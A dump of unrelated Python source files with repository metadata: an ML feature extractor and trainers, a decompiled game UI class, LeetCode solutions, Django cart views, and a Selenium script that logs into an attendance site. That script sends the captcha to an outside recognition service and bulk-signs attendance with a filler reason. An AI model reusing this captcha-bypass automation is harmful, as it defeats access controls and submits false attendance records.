# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSDFeatureExtractor for MobilenetV1 PPN features."""
import tensorflow as tf
from ml_tools.object_detection.meta_architectures import ssd_meta_arch
from ml_tools.object_detection.models import feature_map_generators
from ml_tools.object_detection.utils import context_manager
from ml_tools.object_detection.utils import ops
from ml_tools.object_detection.utils import shape_utils
from ml_tools.nets import mobilenet_v1
slim = tf.contrib.slim
class SSDMobileNetV1PpnFeatureExtractor(ssd_meta_arch.SSDFeatureExtractor):
"""SSD Feature Extractor using MobilenetV1 PPN features."""
def preprocess(self, resized_inputs):
"""SSD preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def extract_features(self, preprocessed_inputs):
"""Extract features from preprocessed inputs.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
feature_maps: a list of tensors where the ith tensor has shape
[batch, height_i, width_i, depth_i]
"""
preprocessed_inputs = shape_utils.check_min_image_dim(
33, preprocessed_inputs)
with tf.variable_scope('MobilenetV1',
reuse=self._reuse_weights) as scope:
with slim.arg_scope(
mobilenet_v1.mobilenet_v1_arg_scope(
is_training=None, regularize_depthwise=True)):
with (slim.arg_scope(self._conv_hyperparams_fn())
if self._override_base_feature_extractor_hyperparams
else context_manager.IdentityContextManager()):
_, image_features = mobilenet_v1.mobilenet_v1_base(
ops.pad_to_multiple(preprocessed_inputs, self._pad_to_multiple),
final_endpoint='Conv2d_13_pointwise',
min_depth=self._min_depth,
depth_multiplier=self._depth_multiplier,
use_explicit_padding=self._use_explicit_padding,
scope=scope)
with slim.arg_scope(self._conv_hyperparams_fn()):
feature_maps = feature_map_generators.pooling_pyramid_feature_maps(
base_feature_map_depth=0,
num_layers=6,
image_features={
'image_features': image_features['Conv2d_11_pointwise']
})
return feature_maps.values()
|
[
"frkhit@gmail.com"
] |
frkhit@gmail.com
|
16febf386bbb52f000770bc909d67557720a0f3b
|
53784d3746eccb6d8fca540be9087a12f3713d1c
|
/res/packages/scripts/scripts/client/gui/Scaleform/daapi/view/meta/BattleEndWarningPanelMeta.py
|
67bbe6c0f9117393281defdf84811f8d3554b181
|
[] |
no_license
|
webiumsk/WOT-0.9.17.1-CT
|
736666d53cbd0da6745b970e90a8bac6ea80813d
|
d7c3cf340ae40318933e7205bf9a17c7e53bac52
|
refs/heads/master
| 2021-01-09T06:00:33.898009
| 2017-02-03T21:40:17
| 2017-02-03T21:40:17
| 80,870,824
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 1,091
|
py
|
# 2017.02.03 21:50:47 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BattleEndWarningPanelMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class BattleEndWarningPanelMeta(BaseDAAPIComponent):
"""
DO NOT MODIFY!
Generated with yaml.
__author__ = 'yaml_processor'
@extends BaseDAAPIComponent
"""
def as_setTotalTimeS(self, minutes, seconds):
if self._isDAAPIInited():
return self.flashObject.as_setTotalTime(minutes, seconds)
def as_setTextInfoS(self, text):
if self._isDAAPIInited():
return self.flashObject.as_setTextInfo(text)
def as_setStateS(self, isShow):
if self._isDAAPIInited():
return self.flashObject.as_setState(isShow)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\daapi\view\meta\BattleEndWarningPanelMeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:50:47 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
0126f26c50a8babbd38d8d7ece652c250b42d88c
|
1b6e103ff6e88b25cfdbd2599010778639c0037b
|
/src/utils/base_trainer.py
|
65c7d7021fb0d0a689792f68ca7a3d6cc511e411
|
[] |
no_license
|
aerubanov/d3s_repro
|
60ba4c8698c73cfff0f14c751ae6a929428f62f6
|
a4a5288821dd2c3193ab24e4aac6d6cf99b94964
|
refs/heads/main
| 2023-06-18T04:00:07.046476
| 2021-07-15T11:20:29
| 2021-07-15T11:20:29
| 377,503,066
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,192
|
py
|
import os
import glob
import torch
from src.utils import loading
class BaseTrainer:
"""Base trainer class. Contains functions for training and saving/loading chackpoints.
Trainer classes should inherit from this one and overload the train_epoch function."""
def __init__(self, actor, loaders, optimizer, settings, lr_scheduler=None):
"""
args:
actor - The actor for training the network
loaders - list of dataset loaders, e.g. [train_loader, val_loader].
In each epoch, the trainer runs one epoch for each loader.
optimizer - The optimizer used for training, e.g. Adam
settings - Training settings
lr_scheduler - Learning rate scheduler
"""
self.actor = actor
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.loaders = loaders
self.update_settings(settings)
self.epoch = 0
self.stats = {}
self.device = getattr(settings, 'device', None)
if self.device is None:
self.device = torch.device("cuda" if torch.cuda.is_available() and settings.use_gpu else "cpu")
print(self.device)
self.actor.to(self.device)
def update_settings(self, settings=None):
"""Updates the trainer settings. Must be called to update internal settings."""
if settings is not None:
self.settings = settings
if self.settings.workspace_dir is not None:
self.settings.workspace_dir = os.path.expanduser(self.settings.workspace_dir)
self._checkpoint_dir = os.path.join(self.settings.workspace_dir, 'checkpoints')
if not os.path.exists(self._checkpoint_dir):
os.makedirs(self._checkpoint_dir)
else:
self._checkpoint_dir = None
def train(self, max_epochs, load_latest=False, fail_safe=True):
"""Do training for the given number of epochs.
args:
max_epochs - Max number of training epochs,
load_latest - Bool indicating whether to resume from latest epoch.
fail_safe - Bool indicating whether the training to automatically restart in case of any crashes.
"""
epoch = -1
num_tries = 10
for i in range(num_tries):
try:
if load_latest:
self.load_checkpoint()
for epoch in range(self.epoch+1, max_epochs+1):
self.epoch = epoch
if self.lr_scheduler is not None:
self.lr_scheduler.step()
self.train_epoch()
if self._checkpoint_dir:
self.save_checkpoint()
except:
print('Training crashed at epoch {}'.format(epoch))
if fail_safe:
load_latest = True
print('Restarting training from last epoch ...')
else:
raise
print('Finished training!')
def train_epoch(self):
raise NotImplementedError
def save_checkpoint(self):
"""Saves a checkpoint of the network and other variables."""
actor_type = type(self.actor).__name__
net_type = type(self.actor.net).__name__
state = {
'epoch': self.epoch,
'actor_type': actor_type,
'net_type': net_type,
'net': self.actor.net.state_dict(),
'net_info': getattr(self.actor.net, 'info', None),
'constructor': getattr(self.actor.net, 'constructor', None),
'optimizer': self.optimizer.state_dict(),
'stats': self.stats,
'settings': self.settings
}
directory = '{}/{}'.format(self._checkpoint_dir, self.settings.project_path)
if not os.path.exists(directory):
os.makedirs(directory)
file_path = '{}/{}_ep{:04d}.pth.tar'.format(directory, net_type, self.epoch)
torch.save(state, file_path)
def load_checkpoint(self, checkpoint = None, fields = None,
ignore_fields = None, load_constructor = False):
"""Loads a network checkpoint file.
Can be called in three different ways:
load_checkpoint():
Loads the latest epoch from the workspace. Use this to continue training.
load_checkpoint(epoch_num):
Loads the network at the given epoch number (int).
load_checkpoint(path_to_checkpoint):
Loads the file from the given absolute path (str).
"""
actor_type = type(self.actor).__name__
net_type = type(self.actor.net).__name__
if checkpoint is None:
# Load most recent checkpoint
checkpoint_list = sorted(
glob.glob('{}/{}/{}_ep*.pth.tar'.format(
self._checkpoint_dir,
self.settings.project_path,
net_type)
)
)
if checkpoint_list:
checkpoint_path = checkpoint_list[-1]
else:
print('No matching checkpoint file found')
return
elif isinstance(checkpoint, int):
# Checkpoint is the epoch number
checkpoint_path = '{}/{}/{}_ep{:04d}.pth.tar'.format(
self._checkpoint_dir,
self.settings.project_path,
net_type,
checkpoint)
elif isinstance(checkpoint, str):
# checkpoint is the path
checkpoint_path = os.path.expanduser(checkpoint)
else:
raise TypeError
# Load network
checkpoint_dict = loading.torch_load_legacy(checkpoint_path)
assert net_type == checkpoint_dict['net_type'], 'Network is not of correct type.'
if fields is None:
fields = checkpoint_dict.keys()
if ignore_fields is None:
ignore_fields = ['settings']
# Never load the scheduler. It exists in older checkpoints.
ignore_fields.extend(['lr_scheduler', 'constructor', 'net_type',
'actor_type', 'net_info'])
# Load all fields
for key in fields:
if key in ignore_fields:
continue
if key == 'net':
self.actor.net.load_state_dict(checkpoint_dict[key])
elif key == 'optimizer':
self.optimizer.load_state_dict(checkpoint_dict[key])
else:
setattr(self, key, checkpoint_dict[key])
# Set the net info
if (load_constructor and 'constructor' in checkpoint_dict and
checkpoint_dict['constructor'] is not None):
self.actor.net.constructor = checkpoint_dict['constructor']
if 'net_info' in checkpoint_dict and checkpoint_dict['net_info'] is not None:
self.actor.net.info = checkpoint_dict['net_info']
# Update the epoch in lr scheduler
if 'epoch' in fields:
self.lr_scheduler.last_epoch = self.epoch
return True
|
[
"anatolijrubanov@gmail.com"
] |
anatolijrubanov@gmail.com
|
655fc2da230286506efb37fa4e3fc627064b3cfc
|
fc004129430e8527d763f049d5e3e103968da495
|
/Create Your Own Image Classifier/train.py
|
91291d2e1eef6e213e8754d30449a92de6d9d2a7
|
[
"MIT"
] |
permissive
|
Abhishek20182/AI-Programming-with-Python-Nanodegree-Program
|
8d25d9339f0096ab4375a54a87cc4a97bf39ae1d
|
640e03a527f8b0a6fbb996f0d7a6665edb64800b
|
refs/heads/master
| 2022-11-18T14:26:22.704529
| 2020-06-26T12:34:14
| 2020-06-26T12:34:14
| 262,749,427
| 1
| 0
|
MIT
| 2020-06-03T09:18:04
| 2020-05-10T09:08:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 7,734
|
py
|
import numpy as np
import torchvision
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torchvision import datasets, models, transforms
from collections import OrderedDict
import argparse
from time import time
def main():
start_time = time()
in_arg = get_input_args()
device = torch.device("cuda:0" if torch.cuda.is_available() and in_arg.gpu else "cpu")
# Load and prepare data
test_datasets, test_dir, train_datasets, train_loader, test_loader = load_data(in_arg.data_dir)
# Build classifier
model, input_size = load_arch(in_arg.arch)
criterion, optimiser = build_classifier(in_arg.hidden_units, in_arg.learning_rate, model, input_size, device)
# Train, test, and validate classifier
validation(test_loader, device, model, criterion)
train_classifier(in_arg.epochs, model, optimiser, device, criterion, train_loader, test_loader)
check_accuracy_on_test(test_loader, device, model)
# Save checkpoint
model.class_to_idx = train_datasets.class_to_idx
torch.save(model, 'check_point.pth')
# Computes overall runtime in seconds
end_time = time()
tot_time = end_time - start_time
# Prints overall runtime in format hh:mm:ss
print("\nTotal Elapsed Runtime:", str( int( (tot_time / 3600) ) ) + ":" +
str( int( ( (tot_time % 3600) / 60 ) ) ) + ":" +
str( int( ( (tot_time % 3600) % 60 ) ) ) )
def get_input_args():
parser = argparse.ArgumentParser(description='Image Classifier')
parser.add_argument('--data_dir', type=str, default='flowers', help='Path to image directory with 3 subdirectories, "train", "valid", and "test"')
parser.add_argument('--arch', type=str, default='vgg19', help='CNN model for image classification; choose either "vgg19" or "alexnet" only')
parser.add_argument('--hidden_units', type=int, default=4096, help='Number of hidden units')
parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for the CNN model')
parser.add_argument('--epochs', type=int, default=9, help='Number of epochs to run')
parser.add_argument('--gpu', type=bool, default=True, help='Train classifier on GPU?')
return parser.parse_args()
def load_data(data_dir):
#Set folder path
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# Defining transforms for the training, validation, and testing sets
data_transforms = {
'train': transforms.Compose([
transforms.RandomRotation(45),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'valid': transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'test': transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
}
#Load datasets
train_datasets = datasets.ImageFolder(train_dir, transform=data_transforms['train'])
valid_datasets = datasets.ImageFolder(valid_dir, transform=data_transforms['valid'])
test_datasets = datasets.ImageFolder(test_dir, transform=data_transforms['test'])
#Load dataloaders
train_loader = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_datasets, batch_size=64, shuffle=True)
test_loader = torch.utils.data.DataLoader(test_datasets, batch_size=64, shuffle=True)
return test_datasets, test_dir, train_datasets, train_loader, test_loader
def load_arch(arch):
if arch=='vgg19':
model = models.vgg19(pretrained=True)
input_size = 25088
elif arch=='alexnet':
model = models.alexnet(pretrained=True)
input_size = 9216
else:
raise ValueError('Please choose either "vgg19" or "alexnet"')
for param in model.parameters():
param.requires_grad = False
return model, input_size
def build_classifier(hidden_units, learning_rate, model, input_size, device):
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(input_size, hidden_units)),
('relu1', nn.ReLU()),
('dropout1', nn.Dropout()),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim=1))
]))
model.classifier = classifier
model.to(device)
criterion = nn.NLLLoss()
optimiser = optim.Adam(model.classifier.parameters(), lr=learning_rate)
return criterion, optimiser
def validation(test_loader, device, model, criterion):
test_loss = 0
accuracy = 0
for inputs, labels in test_loader:
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
test_loss += criterion(output, labels).item()
ps = torch.exp(output)
equality = (labels.data == ps.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
return test_loss, accuracy
def train_classifier(epochs, model, optimiser, device, criterion, train_loader, test_loader):
epochs = epochs
print_every = 64
for e in range(epochs):
running_loss = 0
steps = 0
start = time()
model.train()
for inputs, labels in train_loader:
steps += 1
optimiser.zero_grad()
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
loss = criterion(output, labels)
loss.backward()
optimiser.step()
running_loss += loss.item()
if steps % print_every == 0:
# Set network in evaluation mode for inference
model.eval()
# Turn off gradients for validation to save memory and computations
with torch.no_grad():
test_loss, accuracy = validation(test_loader, device, model, criterion)
print("Epoch: {}/{}.. ".format(e+1, epochs),
"Training Loss: {:.3f}.. ".format(running_loss/print_every),
"Test Loss: {:.3f}.. ".format(test_loss/len(test_loader)),
"Test Accuracy: {:.3f}".format(accuracy/len(test_loader)),
"Device: {}...Time: {:.3f}s".format(device, (time() - start)/3))
running_loss = 0
start = time()
# Turn training back on
model.train()
print("End")
# Test trained network on test data
def check_accuracy_on_test(test_loader, device, model):
correct = 0
total = 0
with torch.no_grad():
for data in test_loader:
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
outputs = model(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total)) #ok
# Call to main function to run the program
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
Abhishek20182.noreply@github.com
|
22a4807e38b136dd298ef817f620f34a8bbbc067
|
d9dbcb98c151155a2eb11dfcedd9201d6291e0dd
|
/5problems_pt5/duplicateZeroes.py
|
fd198875188f47c0fd296fb0c9859e491e8eceee
|
[] |
no_license
|
Absurd1ty/Python-Practice-All
|
41481aaf94e936a82308dfc88016b9969ddb875c
|
ac56a8fb44dd311e81e1eb62a37952c3328c5f17
|
refs/heads/master
| 2023-03-31T12:20:35.812628
| 2021-04-06T01:15:35
| 2021-04-06T01:15:35
| 299,475,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
class Solution:
def duplicateZeros(self, arr: [int]):
i = 0
length = len(arr)
while i < length - 1:
if arr[i] == 0:
currSub = arr[i+1:length-1]
arr[i+1] = 0
arr[i+2:length] = currSub
i += 2
else: i += 1
return arr
result = Solution().duplicateZeros( [1,0,2,3,0,4,5,0])
print(result)
|
[
"noreply@github.com"
] |
Absurd1ty.noreply@github.com
|
fd9ae2fc52ef3eb168f0bee16f72dad075340ad9
|
471cf22054b01e911474a342f379bf1000c5f268
|
/auto_login.py
|
b8f000c3440265e8bf9e92c17bc4f58aa495fe1a
|
[] |
no_license
|
Tsukasa007/ktkjLogin
|
901beb23f8e439defe4aee9522b8705aa31dfec9
|
8a772276a440a7bd2bd1badca03d3eacb5c1591d
|
refs/heads/master
| 2023-05-27T10:09:10.728842
| 2020-05-06T14:43:47
| 2020-05-06T14:43:47
| 205,136,050
| 2
| 0
| null | 2023-05-22T22:16:55
| 2019-08-29T10:12:06
|
Python
|
UTF-8
|
Python
| false
| false
| 6,436
|
py
|
# 方便延时加载
import time
from selenium import webdriver
from PIL import Image, ImageEnhance
import requests
from selenium.webdriver.support.select import Select
import sys
import codecs
import json
import logging
def isElementExist(browser, element):
flag = True
try:
browser.find_element_by_link_text(element)
return flag
except:
flag = False
return flag
def saveImg(browser, imgPath):
browser.get_screenshot_as_file(imgPath)
location = browser.find_element_by_xpath("//*[@id='imgId']").location
size = browser.find_element_by_xpath("//*[@id='imgId']").size
left = location['x']
top = location['y']
right = location['x'] + size['width']
bottom = location['y'] + size['height']
img = Image.open(imgPath).crop((left, top, right, bottom))
img.save(imgPath)
def get_browser(chrome_driver_dir):
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--no-sandbox') # 解决DevToolsActivePort文件不存在的报错
chrome_options.add_argument('window-size=1280x720') # 指定浏览器分辨率
chrome_options.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug
chrome_options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面
# chrome_options.add_argument('blink-settings=imagesEnabled=false') # 不加载图片, 提升速度
# chrome_options.add_argument('--headless') # 浏览器不提供可视化页面. linux下如果系统不支持可视化不加这条会启动失败
# 模拟浏览器打开网站
# browser = webdriver.Chrome(chrome_options=chrome_options)
browser = webdriver.Chrome(executable_path=chrome_driver_dir, chrome_options=chrome_options)
browser.set_window_size(1280, 720)
browser.get('https://ktyw.gdcattsoft.com:8081/ktyw/login.jsp')
return browser
def start(username, password, check_code_url, chrome_driver_dir, save_img_dir, login_success_url, attendance_url,
sleep_tiem):
browser = get_browser(chrome_driver_dir)
isLogin = False
isSuccess = False
while not isLogin:
logging.info(browser.title)
# 将窗口最大化
# browser.maximize_window()
# 根据路径找到按钮,并模拟进行点击
# browser.find_element_by_xpath('/html/body/div[1]/div/div[4]/span/a[1]').click()
# 延时2秒,以便网页加载所有元素,避免之后找不到对应的元素
time.sleep(sleep_tiem * 5)
logging.info("输入账号: " + username)
u = browser.find_element_by_xpath(
"//*[@id='sAccount']")
time.sleep(sleep_tiem)
u.send_keys(username)
logging.info('输入密码: ' + password)
time.sleep(sleep_tiem)
browser.find_element_by_xpath(
"//*[@id='sPasswd']").send_keys(password)
time.sleep(sleep_tiem)
saveImg(browser, save_img_dir)
logging.info("保存图片")
# 识别验证码
files = {'image_file': ("screenImg.png", open(save_img_dir, 'rb'), 'application')}
r = requests.post(url=check_code_url, files=files)
verify_code = json.loads(r.text)['value']
logging.info("识别出验证码: " + verify_code)
logging.info("填写验证码: " + verify_code)
time.sleep(sleep_tiem)
browser.find_element_by_xpath(
"//*[@id='sValidataCode']").send_keys(verify_code)
time.sleep(sleep_tiem)
# 在输入用户名和密码之后,点击登陆按钮
logging.info("点击登录")
browser.find_element_by_xpath("//*[@id='LoginButton']").click()
time.sleep(sleep_tiem)
if isElementExist(browser, '确定'):
logging.info("顶人下号")
browser.find_element_by_link_text('确定').click()
time.sleep(sleep_tiem)
if login_success_url in browser.current_url:
isLogin = True
logging.info("登录成功!")
browser.find_element_by_id("tab_content_todoNone")
else:
browser.get('https://ktyw.gdcattsoft.com:8081/ktyw/login.jsp')
time.sleep(sleep_tiem)
while not isSuccess:
logging.info("转到签到页面: " + attendance_url)
browser.get(attendance_url)
time.sleep(sleep_tiem)
logging.info("全部打钩")
browser.find_element_by_class_name("datagrid-header-check").click()
time.sleep(sleep_tiem)
logging.info("点击批量签到")
browser.find_element_by_class_name("edit").click()
time.sleep(sleep_tiem)
browser.switch_to.frame(browser.find_element_by_xpath("//iframe[contains(@src,'editAttendanceSign.jsp')]"))
time.sleep(sleep_tiem)
# browser.find_element_by_class_name('panel-tool-close').click()
Select(browser.find_element_by_id('IREASON')).select_by_value("99")
logging.info("选择其他99")
time.sleep(sleep_tiem)
browser.find_element_by_name("SREMARK").send_keys("其他其他!213")
time.sleep(sleep_tiem * 2)
browser.find_element_by_css_selector("[class='z-btn-text icon-sub']").click()
# if isElementExist(browser, '操作成功!'):
browser.close()
logging.info("签到成功")
# isSuccess = True
# else:
# browser.switch_to.parent_frame()
def main():
with open("conf/login.json", "r") as f:
login_conf = json.load(f)
username = login_conf["username"]
password = login_conf["password"]
check_code_url = login_conf["check_code_url"]
save_img_dir = login_conf["save_img_dir"]
chrome_driver_dir = login_conf["chrome_driver_dir"]
login_success_url = login_conf["login_success_url"]
attendance_url = login_conf["attendance_url"]
sleep_time = login_conf["sleep_time"]
start(username, password, check_code_url, chrome_driver_dir, save_img_dir, login_success_url, attendance_url,
sleep_time)
if __name__ == '__main__':
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s'
logging.FileHandler(filename='./logs.txt', encoding='utf-8')
logging.basicConfig(level=logging.INFO,
format=fmt,
datefmt='%a, %d %b %Y %H:%M:%S')
main()
|
[
"819582890@qq.com"
] |
819582890@qq.com
|
255421d0e034c53a80bd67fa8cc148e46cebc61e
|
792ae5d2a5c17af4f2ccfa582e3aeec569a6809a
|
/63. Unique Paths II.py
|
1c1f98c62a83cb4c0a740bec2578fdbc20ae5fc5
|
[] |
no_license
|
ADebut/Leetcode
|
396b8b95ad5b5e623db2839bbfdec861c4c1731f
|
7333d481e00e8c1bc5b827d1d4ccd6e4d291abd7
|
refs/heads/master
| 2020-07-05T18:48:27.504540
| 2019-10-28T10:51:43
| 2019-10-28T10:51:43
| 202,735,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
m = len(obstacleGrid)
n = len(obstacleGrid[0])
if obstacleGrid[0][0] == 1:
return 0
dp = [0 for i in range(n)]
for i in range(n):
if obstacleGrid[0][i] == 1:
dp[i] = 0
break
else:
dp[i] = 1
for i in range(i + 1, n):
dp[i] = 0
for i in range(1, m):
for j in range(n):
if obstacleGrid[i][j] == 1:
dp[j] = 0
else:
if j != 0:
dp[j] = dp[j] + dp[j - 1]
return dp[n-1]
|
[
"chen758@usc.edu"
] |
chen758@usc.edu
|
4c3dfe89b2dd19e2f9ef5c8427be243e88a7ff96
|
0319704980f5134701ea97361b8c585839e853bc
|
/Spider/FuZhouTourSpider.py
|
fd53316b39fd1b609374c11940a86b6dfa1a4da3
|
[] |
no_license
|
ttxx9999/ArticleSpider
|
a35785453849c6ce7eda7ac6adccd7752d6b5e8f
|
8f981359273062b8b22de022c7e6999044ebb5f5
|
refs/heads/master
| 2021-01-20T22:01:52.256542
| 2014-10-29T09:21:07
| 2014-10-29T09:21:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,845
|
py
|
import Spider
import re
import logging
import datetime
class FuZhouTourSpider(Spider.Spider):
"""福州旅游资讯网 Spider"""
def __init__(self):
Spider.Spider.__init__(self)
def CatchArticles(self):
abstracts = None
html = self.DownLoadHtml(self.url.format(20, 1), '文章摘要接口{0}访问失败,异常信息为:{1}')
if html == None:
return self.articles
try:
html = html.replace('null', 'None')
abstracts = eval(html)
except Exception as e:
logging.warn('文章摘要信息{0}格式异常,异常信息为:{1}'.format(html, str(e)))
return self.articles
for x in abstracts['data']:
try:
article = dict(
time = datetime.datetime.strptime(x['POST_TIME'].split('.')[0], '%Y-%m-%dT%H:%M:%S'),
url = self.reAbstract.format(x['NEWS_ID']),
title = x['TITLE']
)
html = self.DownLoadHtml(article['url'], '文章明细接口{0}访问失败,异常信息为:{1}')
if html == None:
continue
html = html.replace('null', 'None')
articleInfo = eval(html)['data']
content = articleInfo['news']['CONTENT']
images = []
imageCount = 0
for z in articleInfo['MEDIA']:
try:
imageCount += 1
imageUrl = z['URL']
image = self.DownLoadImage(imageUrl, '图片{0}提取失败,异常信息为:{1}')
if image == None:
continue
images.append(image)
content += self.reArticle.format(imageUrl)
except Exception as e:
logging.warn('图片信息{0}格式异常,异常信息为:{1}'.format(str(z), str(e)))
continue
if imageCount != len(images):
continue
self.CacheArticle(article, content, images, '成功自{0}提取文章')
except Exception as e:
logging.warn('文章明细信息{0}格式异常,异常信息为:{1}'.format(str(x), str(e)))
continue
return self.articles
|
[
"liujinglj518@gmail.com"
] |
liujinglj518@gmail.com
|
d21a0a3c588e67332162c3e3f5f513da5e2119b7
|
4ce44cf2bd1a5c2aca5953e5969b603ca2c75990
|
/myProyecto/Petalos/views.py
|
13bcc9f7ff6a9f589afb13c56c788c584c2d630f
|
[] |
no_license
|
jajinho/PetalosFloreria
|
1074c1276c99d7df9b6717bd4cb4e7edfdbe81bd
|
513ba70c095ac12f4f000e053e27437e7b637db0
|
refs/heads/master
| 2020-09-30T04:49:37.994213
| 2019-12-10T21:27:42
| 2019-12-10T21:27:42
| 227,206,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,186
|
py
|
from django.shortcuts import render
from .models import Floreria,Ticket
from .clases import elemento
from django.contrib.auth.models import User
from django.contrib.auth import authenticate,logout,login as login_autent
from django.contrib.auth.decorators import login_required
import datetime;
# Create your views here.
@login_required(login_url='/login/')
def grabar_carro(request):
x=request.session["carritox"]
usuario=request.user.username
suma=0
try:
for item in x:
nombre=item["nombre"]
precio=int(item["precio"])
cantidad=int(item["cantidad"])
total=int(item["total"])
ticket=Ticket(
usuario=usuario,
nombre=nombre,
precio=precio,
cantidad=cantidad,
total=total,
fecha=datetime.date.today()
)
ticket.save()
suma=suma+int(total)
print("reg grabado")
mensaje="Grabado"
request.session["carritox"] = []
except:
mensaje="error al grabar"
return render(request,'core/carrito.html',{'x':x,'total':suma,'mensaje':mensaje})
@login_required(login_url='/login/')
def carro_compras(request,id):
p=Floreria.objects.get(name=id)
x=request.session["carritox"]
el=elemento(1,p.name,p.valor,1)
sw=0
suma=0
clon=[]
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==p.name:
sw=1
cantidad=int(cantidad)+1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
if sw==0:
clon.append(el.toString())
x=clon
request.session["carritox"]=x
florcita=Floreria.objects.all()
return render(request,'core/galeria.html',{'listaFlores':florcita,'flores':florcita,'total':suma})
@login_required(login_url='/login/')
def carro_compras_mas(request,id):
f=Floreria.objects.get(name=id)
x=request.session["carritox"]
suma=0
clon=[]
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==f.name:
cantidad=int(cantidad)+1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
x=clon
request.session["carritox"]=x
x=request.session["carritox"]
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def carro_compras_menos(request,id):
f=Floreria.objects.get(name=id)
x=request.session["carritox"]
clon=[]
suma=0
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==f.name:
cantidad=int(cantidad)-1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
x=clon
request.session["carritox"]=x
x=request.session["carritox"]
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def galeria(request):
florcita=Floreria.objects.all()
return render(request,'core/galeria.html',{'listaFlores':florcita})
@login_required(login_url='/login/')
def home(request):
return render(request,'core/home.html')
@login_required(login_url='/login/')
def carrito(request):
x=request.session["carritox"]
suma=0
for item in x:
suma=suma+int(item["total"])
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def formulario(request):
flores=Floreria.objects.all()
if request.POST:
nombre=request.POST.get("InputName")
imagen=request.FILES.get("InputFile")
valor=request.POST.get("InputPrecio")
descripcion=request.POST.get("InputDescripcion")
estado=request.POST.get("InputEstado")
stock=request.POST.get("Inputstock")
flor=Floreria(
name=nombre,
fotografia=imagen,
valor=valor,
descripcion=descripcion,
estado=estado,
stock=stock
)
flor.save()
return render(request,'core/formulario.html',{'listaflores':flores,'msg':'Flor Registrada'})
return render(request,'core/formulario.html',{'listaflores':flores})
def login(request):
if request.POST:
usuario=request.POST.get("txtUsuario")
password=request.POST.get("txtPass")
us=authenticate(request,username=usuario,password=password)
msg=''
request.session["carrito"] = []
request.session["carritox"] = []
print('ingresado')
if us is not None and us.is_active:
login_autent(request,us)
florcita=Floreria.objects.all()
return render(request,'core/home.html',{'listaFlores':florcita})
else:
return render(request,'core/login.html')
return render(request,'core/login.html')
def cerrar_session(request):
logout(request)
return render(request,'core/logout.html')
|
[
"alej.gallardog@alumnos.duoc.cl"
] |
alej.gallardog@alumnos.duoc.cl
|
3cb47fafd4503cb268feb2e6a3ead5817f5a93eb
|
aaf21cc38867fa2d675e16b6788b1d48b1cfa73c
|
/gbp/scripts/clone.py
|
63b1468a064b2117b11bf41ab99bfb0539d5ab0d
|
[] |
no_license
|
teselkin/git-buildpackage
|
